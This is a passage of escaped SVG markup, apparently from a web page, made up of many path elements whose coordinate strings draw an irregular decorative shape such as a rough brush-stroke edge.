d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,